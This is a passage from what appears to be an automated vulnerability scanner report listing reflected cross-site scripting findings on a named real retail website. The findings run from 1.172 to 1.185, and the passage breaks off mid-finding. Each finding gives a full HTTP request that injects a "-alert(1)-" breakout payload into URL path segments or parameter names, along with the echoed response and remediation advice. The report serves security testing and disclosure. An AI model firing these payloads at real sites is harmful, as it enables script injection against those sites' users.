<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenf9b08"-alert(1)-"a3170872b3d/jackets/");
//]]>
...[SNIP]...

1.172. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a152f"-alert(1)-"3d9d99bfa20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jacketsa152f"-alert(1)-"3d9d99bfa20/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6rg1nk1384d1d76b76uptsmhd0; expires=Tue, 09-Nov-2010 17:21:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jacketsa152f"-alert(1)-"3d9d99bfa20/");
//]]>
...[SNIP]...

1.173. http://www.fredperry.com/limited-edition/women/jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d11e"-alert(1)-"b8edafd3dcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jackets/?4d11e"-alert(1)-"b8edafd3dcd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mnmvr8jjf8lmeu2ltp2of88na0; expires=Tue, 09-Nov-2010 17:19:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jackets/?4d11e"-alert(1)-"b8edafd3dcd=1");
//]]>
...[SNIP]...

1.174. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b961f"-alert(1)-"fcdca4ddcf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionb961f"-alert(1)-"fcdca4ddcf3/women/jessica-ogden/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9s13ojrvlg1gobuv19o3vi9155; expires=Tue, 09-Nov-2010 17:15:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionb961f"-alert(1)-"fcdca4ddcf3/women/jessica-ogden/");
//]]>
...[SNIP]...

1.175. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27cbb"-alert(1)-"bdf6fdec2fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women27cbb"-alert(1)-"bdf6fdec2fd/jessica-ogden/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8k235i9lhgm9jn9sgh3r21dfa7; expires=Tue, 09-Nov-2010 17:15:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women27cbb"-alert(1)-"bdf6fdec2fd/jessica-ogden/");
//]]>
...[SNIP]...

1.176. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c68"-alert(1)-"27abae530fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jessica-ogdend2c68"-alert(1)-"27abae530fc/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tid48jmod097u2stfo0nd2a5e2; expires=Tue, 09-Nov-2010 17:15:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jessica-ogdend2c68"-alert(1)-"27abae530fc/");
//]]>
...[SNIP]...

1.177. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf5f1"-alert(1)-"ac5226bfd92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jessica-ogden/?bf5f1"-alert(1)-"ac5226bfd92=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7mi7u875n0j1fti1hbijatf3m3; expires=Tue, 09-Nov-2010 17:14:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jessica-ogden/?bf5f1"-alert(1)-"ac5226bfd92=1");
//]]>
...[SNIP]...

1.178. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f00fd"-alert(1)-"1af4778c88e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionf00fd"-alert(1)-"1af4778c88e/women/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=evuojm770mansedc0kpbmgaum1; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionf00fd"-alert(1)-"1af4778c88e/women/knitwear/");
//]]>
...[SNIP]...

1.179. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eebd"-alert(1)-"d37ff8bf82b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women2eebd"-alert(1)-"d37ff8bf82b/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9br5o47e55n53418d1e1jtmcq2; expires=Tue, 09-Nov-2010 17:20:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women2eebd"-alert(1)-"d37ff8bf82b/knitwear/");
//]]>
...[SNIP]...

1.180. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa892"-alert(1)-"6112ce3a2d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/knitwearaa892"-alert(1)-"6112ce3a2d3/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=47h3pa66t9h7jtmvakhcjfjb07; expires=Tue, 09-Nov-2010 17:20:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/knitwearaa892"-alert(1)-"6112ce3a2d3/");
//]]>
...[SNIP]...

1.181. http://www.fredperry.com/limited-edition/women/knitwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fee8d"-alert(1)-"5f12871407c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/knitwear/?fee8d"-alert(1)-"5f12871407c=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=52n4f0jpe4h3s6c7f3eki0h7b2; expires=Tue, 09-Nov-2010 17:18:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/knitwear/?fee8d"-alert(1)-"5f12871407c=1");
//]]>
...[SNIP]...

1.182. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 125f5"-alert(1)-"339b310c262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition125f5"-alert(1)-"339b310c262/women/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s8g9vok5absmav3sjkv3m79d95; expires=Tue, 09-Nov-2010 17:15:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition125f5"-alert(1)-"339b310c262/women/new-styles/");
//]]>
...[SNIP]...

1.183. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c00d"-alert(1)-"3d2b6026ddb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women5c00d"-alert(1)-"3d2b6026ddb/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7mc5c6ge65unqhrcrhbm1lg3g5; expires=Tue, 09-Nov-2010 17:15:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women5c00d"-alert(1)-"3d2b6026ddb/new-styles/");
//]]>
...[SNIP]...

1.184. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76af3"-alert(1)-"e9741ad8f26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/new-styles76af3"-alert(1)-"e9741ad8f26/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i83m7vgo6klbkt13pvu7ha0sf3; expires=Tue, 09-Nov-2010 17:15:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/new-styles76af3"-alert(1)-"e9741ad8f26/");
//]]>
...[SNIP]...

1.185. http://www.fredperry.com/limited-edition/women/new-styles/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ea62"-alert(1)-"7d2c500e6f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

